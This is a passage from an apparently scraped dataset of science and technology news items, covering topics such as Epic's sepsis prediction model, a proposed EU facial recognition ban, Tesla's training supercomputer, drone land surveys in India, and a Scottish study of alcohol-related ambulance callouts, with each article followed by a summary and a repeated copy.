sooner can make a big difference to patient survival. Hospital administrators often take special interest in sepsis response, in part because it contributes to US government hospital ratings . Singh runs a lab at Michigan researching applications of machine learning to patient care. He got curious about Epic's sepsis warning system after being asked to chair a committee at the university's health system created to oversee uses of machine learning. As Singh learned more about the tools in use at Michigan and other health systems, he became concerned that they mostly came from vendors that disclosed little about how they worked or performed. His own system had a license to use Epic's sepsis prediction model, which the company told customers was highly accurate. But there had been no independent validation of its performance. Singh and Michigan colleagues tested Epic's prediction model on records for nearly 30,000 patients covering almost 40,000 hospitalizations in 2018 and 2019. The researchers noted how often Epic's algorithm flagged people who developed sepsis as defined by the CDC and the Centers for Medicare and Medicaid Services. And they compared the alerts that the system would have triggered with sepsis treatments logged by staff, who did not see Epic sepsis alerts for patients included in the study. The researchers say their results suggest Epic's system wouldn't make a hospital much better at catching sepsis and could burden staff with unnecessary alerts. The company's algorithm did not identify two-thirds of the roughly 2,500 sepsis cases in the Michigan data. It would have alerted for 183 patients who developed sepsis but had not been given timely treatment by staff.
215
EU Data Protection Authorities Call for Ban on Facial Recognition
The European Data Protection Supervisor (EDPS) and the European Data Protection Board (EDPB) have urged a ban on the use of artificial intelligence (AI) -driven facial recognition technology in public places. The European Commission's AI bill limits its use in public places by law enforcement, without prohibiting it outright. In a joint statement, EDPB chair Andrea Jeline and EDPS Wojciech Wiewiorowski said, "A general ban on the use of facial recognition in publicly accessible areas is the necessary starting point if we want to preserve our freedoms and create a human-centric legal framework for AI." They also urged a ban on logging gait, fingerprints, DNA, voice, keystrokes, and other biometric data, as well as on AI systems that biometrically distinguish ethnicity, gender, and political or sexual orientation.
[]
[]
[]
scitechnews
None
None
None
None
The European Data Protection Supervisor (EDPS) and the European Data Protection Board (EDPB) have urged a ban on the use of artificial intelligence (AI) -driven facial recognition technology in public places. The European Commission's AI bill limits its use in public places by law enforcement, without prohibiting it outright. In a joint statement, EDPB chair Andrea Jeline and EDPS Wojciech Wiewiorowski said, "A general ban on the use of facial recognition in publicly accessible areas is the necessary starting point if we want to preserve our freedoms and create a human-centric legal framework for AI." They also urged a ban on logging gait, fingerprints, DNA, voice, keystrokes, and other biometric data, as well as on AI systems that biometrically distinguish ethnicity, gender, and political or sexual orientation.
216
Tesla Backs Vision-Only Approach to Autonomy Using Supercomputer
Tesla CEO Elon Musk has been teasing a neural network training computer called "Dojo" since at least 2019. Musk says Dojo will be able to process vast amounts of video data to achieve vision-only autonomous driving. While Dojo itself is still in development, Tesla today revealed a new supercomputer that will serve as a development prototype version of what Dojo will ultimately offer. At the 2021 Conference on Computer Vision and Pattern Recognition on Monday, Tesla's head of AI, Andrej Karpathy, revealed the company's new supercomputer that allows the automaker to ditch radar and lidar sensors on self-driving cars in favor of high-quality optical cameras. During his workshop on autonomous driving, Karpathy explained that to get a computer to respond to a new environment in a way that a human can requires an immense data set, and a massively powerful supercomputer to train the company's neural net-based autonomous driving technology using that data set. Hence the development of these predecessors to Dojo. Tesla's newest-generation supercomputer has 10 petabytes of "hot tier" NVME storage and runs at 1.6 terrabytes per second, according to Karpathy. With 1.8 EFLOPS, he said it might be the fifth most powerful supercomputer in the world, but he conceded later that his team has not yet run the specific benchmark necessary to enter the TOP500 Supercomputing rankings. "That said, if you take the total number of FLOPS it would indeed place somewhere around the fifth spot," Karpathy told TechCrunch. "The fifth spot is currently occupied by Nvidia with their Selene cluster, which has a very comparable architecture and similar number of GPUs (4480 versus ours 5760, so a bit less)." Musk has been advocating for a vision-only approach to autonomy for some time, in large part because cameras are faster than radar or lidar . As of May, Tesla Model Y and Model 3 vehicles in North America are being built without radar, relying on cameras and machine learning to support its advanced driver assistance system and autopilot. Many autonomous driving companies use lidar and high-definition maps, which means they require incredibly detailed maps of the places where they're operating, including all road lanes and how they connect, traffic lights and more. "The approach we take is vision-based, primarily using neural networks that can in principle function anywhere on earth," said Karpathy in his workshop. Replacing a "meat computer," or rather, a human, with a silicon computer results in lower latencies (better reaction time), 360 degree situational awareness and a fully attentive driver that never checks their Instagram, said Karpathy. Karpathy shared some scenarios of how Tesla's supercomputer employs computer vision to correct bad driver behavior, including an emergency braking scenario in which the computer's object detection kicks in to save a pedestrian from being hit, and traffic control warning that can identify a yellow light in the distance and send an alert to a driver that hasn't yet started to slow down. Tesla vehicles have also already proven a feature called pedal misapplication mitigation, in which the car identifies pedestrians in its path, or even a lack of a driving path, and responds to the driver accidentally stepping on the gas instead of braking, potentially saving pedestrians in front of the vehicle or preventing the driver from accelerating into a river. Tesla's supercomputer collects video from eight cameras that surround the vehicle at 36 frames per second, which provides insane amounts of information about the environment surrounding the car, Karpathy explained. While the vision-only approach is more scalable than collecting, building and maintaining high-definition maps everywhere in the world, it's also much more of a challenge, because the neural networks doing the object detection and handling the driving have to be able to collect and process vast quantities of data at speeds that match the depth and velocity recognition capabilities of a human. Karpathy says after years of research, he believes it can be done by treating the challenge as a supervised learning problem. Engineers testing the tech found they could drive around sparsely populated areas with zero interventions, said Karpathy, but "definitely struggle a lot more in very adversarial environments like San Francisco." For the system to truly work well and mitigate the need for things like high-definition maps and additional sensors, it'll have to get much better at dealing with densely populated areas. One of the Tesla AI team game changers has been auto-labeling, through which it can automatically label things like roadway hazards and other objects from millions of videos captured by vehicles on a Tesla camera. Large AI data sets have often required a lot of manual labeling, which is time-consuming, especially when trying to arrive at the kind of cleanly-labeled data set required to make a supervised learning system on a neural network work well. With this latest supercomputer, Tesla has accumulated 1 million videos of around 10 seconds each and labeled 6 billion objects with depth, velocity and acceleration. All of this takes up a whopping 1.5 petabytes of storage. That seems like a massive amount, but it'll take a lot more before the company can achieve the kind of reliability it requires out of an automated driving system that relies on vision systems alone, hence the need to continue developing ever more powerful supercomputers in Tesla's pursuit of more advanced AI.
Tesla's Andrej Karpathy unveiled a new supercomputer at the 2021 Conference on Computer Vision and Pattern Recognition, a prototype of what the automaker's neural network training computer, Dojo, ultimately will become. Tesla CEO Elon Musk has said Dojo will make vision-only autonomous driving a reality. With this new supercomputer, Tesla can replace radar and LiDAR sensors on self-driving cars with high-quality optical cameras. It boasts 10 petabytes of "hot tier" NVME storage and runs at 1.6 terabytes per second. Karpathy said that with 1.8 EFLOPS, Dojo could be the fifth most-powerful supercomputer in the world. Tesla used the supercomputer to gather about 1 million videos of about 10 seconds each and label 6 billion objects within those videos with regard to depth, velocity, and acceleration.
[]
[]
[]
scitechnews
None
None
None
None
Tesla's Andrej Karpathy unveiled a new supercomputer at the 2021 Conference on Computer Vision and Pattern Recognition, a prototype of what the automaker's neural network training computer, Dojo, ultimately will become. Tesla CEO Elon Musk has said Dojo will make vision-only autonomous driving a reality. With this new supercomputer, Tesla can replace radar and LiDAR sensors on self-driving cars with high-quality optical cameras. It boasts 10 petabytes of "hot tier" NVME storage and runs at 1.6 terabytes per second. Karpathy said that with 1.8 EFLOPS, Dojo could be the fifth most-powerful supercomputer in the world. Tesla used the supercomputer to gather about 1 million videos of about 10 seconds each and label 6 billion objects within those videos with regard to depth, velocity, and acceleration. Tesla CEO Elon Musk has been teasing a neural network training computer called "Dojo" since at least 2019. Musk says Dojo will be able to process vast amounts of video data to achieve vision-only autonomous driving. While Dojo itself is still in development, Tesla today revealed a new supercomputer that will serve as a development prototype version of what Dojo will ultimately offer. At the 2021 Conference on Computer Vision and Pattern Recognition on Monday, Tesla's head of AI, Andrej Karpathy, revealed the company's new supercomputer that allows the automaker to ditch radar and lidar sensors on self-driving cars in favor of high-quality optical cameras. During his workshop on autonomous driving, Karpathy explained that to get a computer to respond to a new environment in a way that a human can requires an immense data set, and a massively powerful supercomputer to train the company's neural net-based autonomous driving technology using that data set. Hence the development of these predecessors to Dojo. Tesla's newest-generation supercomputer has 10 petabytes of "hot tier" NVME storage and runs at 1.6 terrabytes per second, according to Karpathy. With 1.8 EFLOPS, he said it might be the fifth most powerful supercomputer in the world, but he conceded later that his team has not yet run the specific benchmark necessary to enter the TOP500 Supercomputing rankings. "That said, if you take the total number of FLOPS it would indeed place somewhere around the fifth spot," Karpathy told TechCrunch. "The fifth spot is currently occupied by Nvidia with their Selene cluster, which has a very comparable architecture and similar number of GPUs (4480 versus ours 5760, so a bit less)." Musk has been advocating for a vision-only approach to autonomy for some time, in large part because cameras are faster than radar or lidar . As of May, Tesla Model Y and Model 3 vehicles in North America are being built without radar, relying on cameras and machine learning to support its advanced driver assistance system and autopilot. Many autonomous driving companies use lidar and high-definition maps, which means they require incredibly detailed maps of the places where they're operating, including all road lanes and how they connect, traffic lights and more. "The approach we take is vision-based, primarily using neural networks that can in principle function anywhere on earth," said Karpathy in his workshop. Replacing a "meat computer," or rather, a human, with a silicon computer results in lower latencies (better reaction time), 360 degree situational awareness and a fully attentive driver that never checks their Instagram, said Karpathy. Karpathy shared some scenarios of how Tesla's supercomputer employs computer vision to correct bad driver behavior, including an emergency braking scenario in which the computer's object detection kicks in to save a pedestrian from being hit, and traffic control warning that can identify a yellow light in the distance and send an alert to a driver that hasn't yet started to slow down. Tesla vehicles have also already proven a feature called pedal misapplication mitigation, in which the car identifies pedestrians in its path, or even a lack of a driving path, and responds to the driver accidentally stepping on the gas instead of braking, potentially saving pedestrians in front of the vehicle or preventing the driver from accelerating into a river. Tesla's supercomputer collects video from eight cameras that surround the vehicle at 36 frames per second, which provides insane amounts of information about the environment surrounding the car, Karpathy explained. While the vision-only approach is more scalable than collecting, building and maintaining high-definition maps everywhere in the world, it's also much more of a challenge, because the neural networks doing the object detection and handling the driving have to be able to collect and process vast quantities of data at speeds that match the depth and velocity recognition capabilities of a human. Karpathy says after years of research, he believes it can be done by treating the challenge as a supervised learning problem. Engineers testing the tech found they could drive around sparsely populated areas with zero interventions, said Karpathy, but "definitely struggle a lot more in very adversarial environments like San Francisco." For the system to truly work well and mitigate the need for things like high-definition maps and additional sensors, it'll have to get much better at dealing with densely populated areas. One of the Tesla AI team game changers has been auto-labeling, through which it can automatically label things like roadway hazards and other objects from millions of videos captured by vehicles on a Tesla camera. Large AI data sets have often required a lot of manual labeling, which is time-consuming, especially when trying to arrive at the kind of cleanly-labeled data set required to make a supervised learning system on a neural network work well. With this latest supercomputer, Tesla has accumulated 1 million videos of around 10 seconds each and labeled 6 billion objects with depth, velocity and acceleration. All of this takes up a whopping 1.5 petabytes of storage. That seems like a massive amount, but it'll take a lot more before the company can achieve the kind of reliability it requires out of an automated driving system that relies on vision systems alone, hence the need to continue developing ever more powerful supercomputers in Tesla's pursuit of more advanced AI.
217
Digitizing Rural Land Records, 1 Drone at a Time
Nagar and his team went on to study the idea and in April 2020 a pilot project was launched under the Ministry of Panchayati Raj in collaboration with state Panchayati Raj departments, state revenue departments and the Survey of India as technology partner. The pilot operated in nine states - Uttar Pradesh, Uttarakhand, Madhya Pradesh, Haryana, Maharashtra, Karnataka, Punjab, Rajasthan and Andhra Pradesh - according to a statement by the Ministry of Panchayati Raj. In April this year, it was rolled out for implementation across the country and is expected to cover about 6.62 lakh villages by 2024. Hundreds of drone flights have already taken place, just like the one below, collecting aerial images across the country, ranging from the foothills of the Himalayas to the deserts of Rajasthan.
The Indian government's Svamitva (Survey of Villages and Mapping with Improvised Technology in Village Areas) project involves the use of drone technology to survey the inhabited areas of rural villages. The project aims to give villagers a "record of rights" that could be used as an asset and to handle property disputes. A pilot project in nine states was rolled out nationwide in April 2021, and aims to cover about 662,000 villages by 2024. The process involves marking property boundaries with limestone powder and using drones to collect high-resolution aerial images. The images are sent to the Survey of India to be transformed into maps, and villagers are given 15 days to verify the accuracy of their maps. Almost 46,000 villages had been surveyed as of early May.
[]
[]
[]
scitechnews
None
None
None
None
The Indian government's Svamitva (Survey of Villages and Mapping with Improvised Technology in Village Areas) project involves the use of drone technology to survey the inhabited areas of rural villages. The project aims to give villagers a "record of rights" that could be used as an asset and to handle property disputes. A pilot project in nine states was rolled out nationwide in April 2021, and aims to cover about 662,000 villages by 2024. The process involves marking property boundaries with limestone powder and using drones to collect high-resolution aerial images. The images are sent to the Survey of India to be transformed into maps, and villagers are given 15 days to verify the accuracy of their maps. Almost 46,000 villages had been surveyed as of early May. Nagar and his team went on to study the idea and in April 2020 a pilot project was launched under the Ministry of Panchayati Raj in collaboration with state Panchayati Raj departments, state revenue departments and the Survey of India as technology partner. The pilot operated in nine states - Uttar Pradesh, Uttarakhand, Madhya Pradesh, Haryana, Maharashtra, Karnataka, Punjab, Rajasthan and Andhra Pradesh - according to a statement by the Ministry of Panchayati Raj. In April this year, it was rolled out for implementation across the country and is expected to cover about 6.62 lakh villages by 2024. Hundreds of drone flights have already taken place, just like the one below, collecting aerial images across the country, ranging from the foothills of the Himalayas to the deserts of Rajasthan.
219
Researchers Create Brain Interface That Can Sing What a Bird's Thinking
Researchers from the University of California San Diego recently built a machine learning system that predicts what a bird's about to sing as they're singing it. The big idea here is real-time speech synthesis for vocal prosthesis. But the implications could go much further. Up front: Birdsong is a complex form of communication that involves rhythm, pitch, and, most importantly, learned behaviors. According to the researchers, teaching an AI to understand these songs is a valuable step in training systems that can replace biological human vocalizations: But translating vocalizations in real-time is no easy challenge. Current state-of-the art systems are slow compared to our natural thought-to-speech patterns. Think about it: cutting-edge natural language processing systems struggle to keep up with human thought. When you interact with your Google Assistant or Alexa virtual assistant, there's often a longer pause than you'd expect if you were talking to a real person. This is because the AI is processing your speech, determining what each word means in relation to its abilities, and then figuring out which packages or programs to access and deploy. In the grand scheme, it's amazing that these cloud-based systems work as fast as they do. But they're still not good enough for the purpose of creating a seamless interface for non-vocal people to speak through at the speed of thought. The work: First, the team implanted electrodes in a dozen bird brains (zebra finches, to be specific) and then started recording activity as the birds sang. But it's not enough just to train an AI to recognize neural activity as a bird sings - even a bird's brain is far too complex to entirely map how communications work across its neurons. So the researchers trained another system to reduce real-time songs down to recognizable patterns the AI can work with. Quick take: This is pretty cool in that it does provide a solution to an outstanding problem. Processing birdsong in real-time is impressive and replicating these results with human speech would be a eureka moment. But, this early work isn't ready for primetime just yet. It appears to be a shoebox solution in that it's not necessarily adaptable to other speech systems in its current iteration. In order to get it functioning fast enough, the researchers had to create a shortcut to speech analysis that might not work when you expand it beyond a bird's vocabulary. That being said, with further development this could be among the first giant technological leaps for brain computer interfaces since the deep learning renaissance of 2014. Read the whole paper here .
A machine learning system developed by University of California San Diego researchers can predict what a bird is about to sing, a step on the road to training systems to translate human speech in real time. The researchers implanted electrodes in the brains of a dozen zebra finches and recorded neural activity as the birds sang. They trained another system to reduce the birds' real-time songs to recognizable patterns. The researchers said, "Birdsong shares a number of unique similarities with human speech, and its study has yielded general insight into multiple mechanisms and circuits behind learning, execution, and maintenance of vocal motor skill."
[]
[]
[]
scitechnews
None
None
None
None
A machine learning system developed by University of California San Diego researchers can predict what a bird is about to sing, a step on the road to training systems to translate human speech in real time. The researchers implanted electrodes in the brains of a dozen zebra finches and recorded neural activity as the birds sang. They trained another system to reduce the birds' real-time songs to recognizable patterns. The researchers said, "Birdsong shares a number of unique similarities with human speech, and its study has yielded general insight into multiple mechanisms and circuits behind learning, execution, and maintenance of vocal motor skill." Researchers from the University of California San Diego recently built a machine learning system that predicts what a bird's about to sing as they're singing it. The big idea here is real-time speech synthesis for vocal prosthesis. But the implications could go much further. Up front: Birdsong is a complex form of communication that involves rhythm, pitch, and, most importantly, learned behaviors. According to the researchers, teaching an AI to understand these songs is a valuable step in training systems that can replace biological human vocalizations: But translating vocalizations in real-time is no easy challenge. Current state-of-the art systems are slow compared to our natural thought-to-speech patterns. Think about it: cutting-edge natural language processing systems struggle to keep up with human thought. When you interact with your Google Assistant or Alexa virtual assistant, there's often a longer pause than you'd expect if you were talking to a real person. This is because the AI is processing your speech, determining what each word means in relation to its abilities, and then figuring out which packages or programs to access and deploy. In the grand scheme, it's amazing that these cloud-based systems work as fast as they do. But they're still not good enough for the purpose of creating a seamless interface for non-vocal people to speak through at the speed of thought. The work: First, the team implanted electrodes in a dozen bird brains (zebra finches, to be specific) and then started recording activity as the birds sang. But it's not enough just to train an AI to recognize neural activity as a bird sings - even a bird's brain is far too complex to entirely map how communications work across its neurons. So the researchers trained another system to reduce real-time songs down to recognizable patterns the AI can work with. Quick take: This is pretty cool in that it does provide a solution to an outstanding problem. Processing birdsong in real-time is impressive and replicating these results with human speech would be a eureka moment. But, this early work isn't ready for primetime just yet. It appears to be a shoebox solution in that it's not necessarily adaptable to other speech systems in its current iteration. In order to get it functioning fast enough, the researchers had to create a shortcut to speech analysis that might not work when you expand it beyond a bird's vocabulary. That being said, with further development this could be among the first giant technological leaps for brain computer interfaces since the deep learning renaissance of 2014. Read the whole paper here .
220
Israeli Researchers Develop Electronic Nose to Detect Diseases, Poisons
An artificial nose developed by researchers at Israel's Ben-Gurion University of the Negev (BGU) can distinguish between different types of bacteria, viruses, and poisonous gases based on their "smell print." This smell print is produced by the absorption of gases using carbon nanoparticles and the electrical reaction caused by the particles as a result of the absorption. The researchers said they "were able to 'train' the electronic nose using machine learning techniques to detect different gas molecules, individually or in a mixture, with high accuracy." BGU's Raz Yelink said the low-cost technology could be used to warn cities about the presence of dangerous gases and air pollution, detect bacterial infections within an hour via a "throat swab" test, and warn of the presence of bacteria in food products.
[]
[]
[]
scitechnews
None
None
None
None
An artificial nose developed by researchers at Israel's Ben-Gurion University of the Negev (BGU) can distinguish between different types of bacteria, viruses, and poisonous gases based on their "smell print." This smell print is produced by the absorption of gases using carbon nanoparticles and the electrical reaction caused by the particles as a result of the absorption. The researchers said they "were able to 'train' the electronic nose using machine learning techniques to detect different gas molecules, individually or in a mixture, with high accuracy." BGU's Raz Yelink said the low-cost technology could be used to warn cities about the presence of dangerous gases and air pollution, detect bacterial infections within an hour via a "throat swab" test, and warn of the presence of bacteria in food products.
223
Algorithm Shows the Alcohol Burden on Ambulance Service in Scotland
86,780 ambulance callouts were identified as alcohol-related in 2019, using a new method based on the notes taken by paramedics at the scene. This figure, an average of more than 230 call-outs every day, is more than three times higher than previously reported. Whilst paramedics have long described a heavy burden of alcohol on the Scottish ambulance service, this is the first study to accurately quantify that burden in a robust way that can be routinely monitored. Ambulance services often represent a patient's first - and sometimes only - contact with health services for a particular alcohol-related issue. In new research led by Francesco Manca and Professor Jim Lewsey at the University of Glasgow and published in the International Journal of Environmental Research and Public Health, researchers reveal a new approach to accurately determine how many ambulance callouts are alcohol-related. The work was part of a study led by Professor Niamh Fitzgerald at the University of Stirling, and was also co-authored by colleagues at the University of Sheffield and the Scottish Ambulance Service (SAS). Using data from SAS, the team of researchers were able to build a highly accurate algorithm that searched paramedic notes in patient records for references to alcohol. Applying this automated method to records from 2019, they found that one in six ambulance callouts (16.2%) was alcohol-related. This rose to over one in four (28.2%) at weekend nighttimes (6pm to 6am). The algorithm showed that age was an important factor - with alcohol being related to approximately a quarter of callouts for those aged under 40 years old, but less than 7% in those aged 70 years old and above. Socio-economic deprivation was also found to be a factor. For callouts to addresses in the most deprived areas, 20% were deemed to be alcohol-related, while for callouts in the least deprived areas, 10% were alcohol-related. The algorithm was found to perform very well (99% accuracy) in identifying callouts from notes when compared to the professional judgement of an experienced paramedic who reviewed complete patient records. This method also has the advantage over previous methods of being easy for SAS to apply routinely to monitor alcohol-related callouts over time. Prior methods resulted in either large underestimates or used reports from staff surveys which could not be tested for accuracy or routinely carried out. Prof Jim Lewsey, Professor of Medical Statistics, of the University of Glasgow's Institute of Health and Wellbeing, said: "We have shown that there is a high burden of alcohol on ambulance callouts in Scotland. This is particularly true at weekends, for callouts involving younger people and for callouts to addresses in areas with high levels of socio-economic deprivation. These data can be used to monitor trends over time and inform alcohol policy decision making both at local and national levels. Further, our methodological approach can be applied to other contexts for determining the burden of other factors to the ambulance service." Based on the average cost of an ambulance callout in 2019, researchers estimate the total cost of alcohol-related callouts at approximately £31.5 million, though the exact figure would depend on the complexity of alcohol-related call outs, compared with non-alcohol-related call outs. Importantly, this analysis did not examine how many alcohol-related callouts arose from drinking in homes or licensed premises. Prof Niamh Fitzgerald, Professor of Alcohol Policy and Director of the Institute for Social Marketing and Health at the University of Stirling is Principal Investigator for the overall study evaluating the impact of minimum unit pricing of alcohol on alcohol-related ambulance callouts in Scotland. Prof. Fitzgerald added: "As we emerge from the COVID-19 pandemic, we all want to protect NHS services for when they are most needed. It is timely therefore to consider whether it is acceptable that over 230 ambulance callouts every day are linked to alcohol when we have policy solutions that can reduce this burden. We are also conducting further research to understand what types of callouts and drinking locations give rise to these figures and how they are experienced by paramedics." Dr Jim Ward, Medical Director at the Scottish Ambulance Service (SAS) said: "This study is very welcome as it gives SAS the ability to better understand the impact alcohol has on the demand for ambulance response. Our frontline staff consistently see the serious effects unsafe levels of alcohol have on people's lives and we would urge the public to drink responsibly." The study, 'Estimating the burden of alcohol on ambulance callouts through development and validation of an algorithm using electronic patient records' is published in the International Journal of Environmental Research and Public Health. The work was funded by the Scottish Government Chief Scientist Office. Enquiries: [email protected] or [email protected] / 0141 330 6557 or 0141 330 4831 First published: 21 June 2021
Researchers at the U.K.'s University of Glasgow led a team that developed an algorithm to determine the number of alcohol-related ambulance callouts by the Scottish Ambulance Service (SAS). The study, the first to quantify the burden of alcohol on SAS, used 2019 SAS data to determine that 16.2% of ambulance callouts were alcohol-related, more than three times higher than reported previously. The algorithm searches paramedic notes in patient records for references to alcohol with 99% accuracy compared to reviews of records by an experienced paramedic. The researchers estimated the total cost of these callouts at about £31.5 million (US$44 million). SAS medical director Dr. Jim Ward said the study helps his organization "to better understand the impact alcohol has on the demand for ambulance response."
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the U.K.'s University of Glasgow led a team that developed an algorithm to determine the number of alcohol-related ambulance callouts by the Scottish Ambulance Service (SAS). The study, the first to quantify the burden of alcohol on SAS, used 2019 SAS data to determine that 16.2% of ambulance callouts were alcohol-related, more than three times higher than reported previously. The algorithm searches paramedic notes in patient records for references to alcohol with 99% accuracy compared to reviews of records by an experienced paramedic. The researchers estimated the total cost of these callouts at about £31.5 million (US$44 million). SAS medical director Dr. Jim Ward said the study helps his organization "to better understand the impact alcohol has on the demand for ambulance response." 86,780 ambulance callouts were identified as alcohol-related in 2019, using a new method based on the notes taken by paramedics at the scene. This figure, an average of more than 230 call-outs every day, is more than three times higher than previously reported. Whilst paramedics have long described a heavy burden of alcohol on the Scottish ambulance service, this is the first study to accurately quantify that burden in a robust way that can be routinely monitored. Ambulance services often represent a patient's first - and sometimes only - contact with health services for a particular alcohol-related issue. In new research led by Francesco Manca and Professor Jim Lewsey at the University of Glasgow and published in the International Journal of Environmental Research and Public Health, researchers reveal a new approach to accurately determine how many ambulance callouts are alcohol-related. The work was part of a study led by Professor Niamh Fitzgerald at the University of Stirling, and was also co-authored by colleagues at the University of Sheffield and the Scottish Ambulance Service (SAS). Using data from SAS, the team of researchers were able to build a highly accurate algorithm that searched paramedic notes in patient records for references to alcohol. Applying this automated method to records from 2019, they found that one in six ambulance callouts (16.2%) was alcohol-related. This rose to over one in four (28.2%) at weekend nighttimes (6pm to 6am). The algorithm showed that age was an important factor - with alcohol being related to approximately a quarter of callouts for those aged under 40 years old, but less than 7% in those aged 70 years old and above. Socio-economic deprivation was also found to be a factor. For callouts to addresses in the most deprived areas, 20% were deemed to be alcohol-related, while for callouts in the least deprived areas, 10% were alcohol-related. The algorithm was found to perform very well (99% accuracy) in identifying callouts from notes when compared to the professional judgement of an experienced paramedic who reviewed complete patient records. This method also has the advantage over previous methods of being easy for SAS to apply routinely to monitor alcohol-related callouts over time. Prior methods resulted in either large underestimates or used reports from staff surveys which could not be tested for accuracy or routinely carried out. Prof Jim Lewsey, Professor of Medical Statistics, of the University of Glasgow's Institute of Health and Wellbeing, said: "We have shown that there is a high burden of alcohol on ambulance callouts in Scotland. This is particularly true at weekends, for callouts involving younger people and for callouts to addresses in areas with high levels of socio-economic deprivation. These data can be used to monitor trends over time and inform alcohol policy decision making both at local and national levels. Further, our methodological approach can be applied to other contexts for determining the burden of other factors to the ambulance service." Based on the average cost of an ambulance callout in 2019, researchers estimate the total cost of alcohol-related callouts at approximately £31.5 million, though the exact figure would depend on the complexity of alcohol-related call outs, compared with non-alcohol-related call outs. Importantly, this analysis did not examine how many alcohol-related callouts arose from drinking in homes or licensed premises. Prof Niamh Fitzgerald, Professor of Alcohol Policy and Director of the Institute for Social Marketing and Health at the University of Stirling is Principal Investigator for the overall study evaluating the impact of minimum unit pricing of alcohol on alcohol-related ambulance callouts in Scotland. Prof. Fitzgerald added: "As we emerge from the COVID-19 pandemic, we all want to protect NHS services for when they are most needed. It is timely therefore to consider whether it is acceptable that over 230 ambulance callouts every day are linked to alcohol when we have policy solutions that can reduce this burden. We are also conducting further research to understand what types of callouts and drinking locations give rise to these figures and how they are experienced by paramedics." Dr Jim Ward, Medical Director at the Scottish Ambulance Service (SAS) said: "This study is very welcome as it gives SAS the ability to better understand the impact alcohol has on the demand for ambulance response. Our frontline staff consistently see the serious effects unsafe levels of alcohol have on people's lives and we would urge the public to drink responsibly." The study, 'Estimating the burden of alcohol on ambulance callouts through development and validation of an algorithm using electronic patient records' is published in the International Journal of Environmental Research and Public Health. The work was funded by the Scottish Government Chief Scientist Office. Enquiries: [email protected] or [email protected] / 0141 330 6557 or 0141 330 4831 First published: 21 June 2021
227
Science Denial, Partisanship on Social Media Indicate Where COVID-19 Strikes Next
Contact: Gary Polakovic at [email protected] or [email protected] In the realm of social media, anti-science views about COVID-19 align so closely with political ideology - especially among conservatives - that its predictability offers a strategy to help protect public health, a new USC study shows. Resistance to science, including the efficacy of masks and vaccines, poses a challenge to conquering the coronavirus crisis. The goal of achieving herd immunity won't happen until society achieves consensus about science-based solutions. The USC study's machine-learning assisted analysis of social media communications offers policymakers and public health officials new tools to anticipate shifts in attitudes and proactively respond. "We show that anti-science views are aligned with political ideology, specifically conservatism," said Kristina Lerman , lead author of the study and a professor at the USC Viterbi School of Engineering. "While that's not necessarily brand new, we discovered this entirely from social media data that gives detailed clues about where COVID-19 is likely to spread so we can take preventive measures." The study was published this week in the Journal of Medical Internet Research . New study takes a different tack P revious surveys and polls have shown a partisan gulf in views about COVID-19 as well as the costs and benefits of remedies. By contrast, the USC study examined public health attitudes based on Twitter tweets between Jan. 21 and May 1, 2020. They sorted people into three groups - liberal versus conservative, pro-science versus anti-science, and hardline versus moderate - then trained machine-learning algorithms to sort all the other people. They used geographical data to pare 115 million tweets worldwide down to 27 million tweets by 2.4 million users in the United States. The researchers further parsed the data by demographics and geography and tracked it over the three-month study period. This approach allowed for near real-time monitoring of partisan and pseudo-science attitudes that could be refined in high detail aided by advanced computing techniques. What emerged is the ability to track public discourse around COVID-19 and compare it with epidemiological outcomes. For example, the researchers found that anti-science attitudes posted between January and April 2020 were high in some Mountain West and Southern states that were later hit with deadly COVID-19 surges. In addition, the researchers were able to probe specific topics important to each group: anti-science conservatives were focused on political topics, including former President Trump's reelection campaigns and QAnon conspiracies, while pro-science conservatives paid attention to global outbreaks of the virus and focused more on preventive measures to "flatten the curve." Researchers were able to track attitudes across time and geography to see how they changed. For example, to their surprise, they found that polarization on the topic of science went down over time. Perhaps most encouraging, they discovered that, even in a highly polarized population, "the number of pro-science, politically moderate users dwarfs other ideological groups, especially anti-science groups." They said their results suggest most people are ready to accept scientific evidence and trust scientists. Social media as a tool to anticipate disease outbreak The findings can also help policymakers and public health officials. If they see anti-science sentiment growing in one region of the country, they can tailor messages to mitigate distrust of science while also preparing for a potential disease outbreak. "Now we can use social media data for science, to create spatial and temporal maps of public opinions along ideological lines, pro- and anti-science lines," said Lerman, a computer scientist and expert in mining social media for clues about human behavior at USC's Information Sciences Institute. "We can also see what topics are important to these segments of society, and we can plan proactively to prevent disease outbreaks from happening." Support for the study comes from the Air Force Office of Scientific Research (grant FA9550-20-1-0224) and the Defense Advanced Research Projects Agency (DARPA, grant W911NF-17-C-0094). The study authors are Lerman, Ashwin Rao, Fred Morstatter, Minda Hu, Emily Chen, Keith Burghardt and Emilio Ferrara of the Information Sciences Institute. The work was supported in part by the Air Force Office of Scientific Research and the Defense Advanced Research Projects Agency. Illustration credit: iStock
A machine learning-assisted social media analysis by researchers at the University of Southern California (USC) could help predict where COVID-19 will emerge next, based on anti-science views and political ideology. USC's Kristina Lerman said the study determined entirely from social media data that "anti-science views are aligned with political ideology, specifically conservatism." Using 27 million Twitter tweets posted by 2.4 million U.S. users from Jan. 21 to May 1, 2020, the researchers compared public discourse on COVID-19 with epidemiological outcomes. They found that anti-science attitudes were high from January through April 2020 in Mountain West and Southern states that experienced COVID-19 surges.
[]
[]
[]
scitechnews
None
None
None
None
A machine learning-assisted social media analysis by researchers at the University of Southern California (USC) could help predict where COVID-19 will emerge next, based on anti-science views and political ideology. USC's Kristina Lerman said the study determined entirely from social media data that "anti-science views are aligned with political ideology, specifically conservatism." Using 27 million Twitter tweets posted by 2.4 million U.S. users from Jan. 21 to May 1, 2020, the researchers compared public discourse on COVID-19 with epidemiological outcomes. They found that anti-science attitudes were high from January through April 2020 in Mountain West and Southern states that experienced COVID-19 surges. Contact: Gary Polakovic at [email protected] or [email protected] In the realm of social media, anti-science views about COVID-19 align so closely with political ideology - especially among conservatives - that its predictability offers a strategy to help protect public health, a new USC study shows. Resistance to science, including the efficacy of masks and vaccines, poses a challenge to conquering the coronavirus crisis. The goal of achieving herd immunity won't happen until society achieves consensus about science-based solutions. The USC study's machine-learning assisted analysis of social media communications offers policymakers and public health officials new tools to anticipate shifts in attitudes and proactively respond. "We show that anti-science views are aligned with political ideology, specifically conservatism," said Kristina Lerman , lead author of the study and a professor at the USC Viterbi School of Engineering. "While that's not necessarily brand new, we discovered this entirely from social media data that gives detailed clues about where COVID-19 is likely to spread so we can take preventive measures." The study was published this week in the Journal of Medical Internet Research . New study takes a different tack P revious surveys and polls have shown a partisan gulf in views about COVID-19 as well as the costs and benefits of remedies. By contrast, the USC study examined public health attitudes 